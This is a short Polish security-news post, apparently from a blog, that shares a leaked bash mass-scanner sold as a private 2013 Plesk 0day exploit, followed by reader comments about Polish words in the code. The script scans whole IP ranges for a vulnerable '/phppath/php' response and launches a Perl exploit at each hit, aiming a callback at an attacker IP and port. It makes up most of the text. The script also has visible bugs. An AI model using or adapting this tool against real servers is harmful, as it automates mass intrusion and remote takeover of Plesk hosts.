W sieci pojawił się skaner niedawo ujawnionego błędu 0day na Pleska. Jeśli wierzyć internetowi, to powstał w kwietniu tego roku. Niektóre linijki kodu wyglądają znajomo. ZOstawiamy Wam przyjemność ich odnalezienia.
# PRIV8 Plesk exploit 04.2013
# By im0tep
#################################
# Set ipv4
ipv4=something.something.was.here
#################################
# Set port
port=5000
#################################
# zmienne
one=.0.0.0
two=.0.0
three=.0
clear
echo -e "\\033[1;42m Select scan Method\\033[m"
echo -e "1.0.0.0 [1]"
echo -e "1.1.0.0 [2]"
echo -e "1.1.1.0 [3]"
read scan
echo -e "\\033[1;42m gimme class to scan\\033[m"
read class
if [ "$scan" == "1" ]; then
./pnscan -w "GET /phppath/php HTTP/1.0\r\n\r\n" -r "500 Internal" $class$one/8 80 >> $class$one.log.80
printf "W";sleep 0.31;printf "a";sleep 0.31;printf "i";sleep 0.31;printf "t";sleep 0.31;printf
cat $class$one.log.80 | awk '{print $1}' >> $class$one.swap
cat $class$one.swap |wc -l echo Vulns
cat $class$one.swap|while read linia;do echo "perl Theo $linia https $ipv4 $port" >> source1;done
chmod +x source1
./source1
fi
if [ "$scan" == "2" ]; then
./pnscan -w "GET /phppath/php HTTP/1.0\r\n\r\n" -r "500 Internal" $class$two/16 80 >> $class$two.log.80
printf "W";sleep 0.31;printf "a";sleep 0.31;printf "i";sleep 0.31;printf "t";sleep 0.31;printf
cat $class$two.log.80 | awk '{print $1}' >> $class$two.swap
cat $class$one.swap |wc -l echo Vulns
cat $class$two.swap|while read linia;do echo "perl Theo $linia https $ipv4 $port" >> source2;done
chmod +x source2
./source2
fi
if [ "$scan" == "3" ]; then
./pnscan -w "GET /phppath/php HTTP/1.0\r\n\r\n" -r "500 Internal" $class$three/24 80 >> $class$three.log.80
printf "W";sleep 0.31;printf "a";sleep 0.31;printf "i";sleep 0.31;printf "t";sleep 0.31;printf
cat $class$three.log.80 | awk '{print $1}' >> $class$three.swap
cat $class$one.swap |wc -l echo Vulns
cat $class$three.swap|while read linia;do echo "perl Theo $linia https $ipv4 $port" >> source3;done
chmod +x source3
./source3
fi
Komentarze
s/odaya/0daya/g
Dzięki, poprawione
while read linia;
Jest jeszcze druga wskazówka :)
# zmienne :D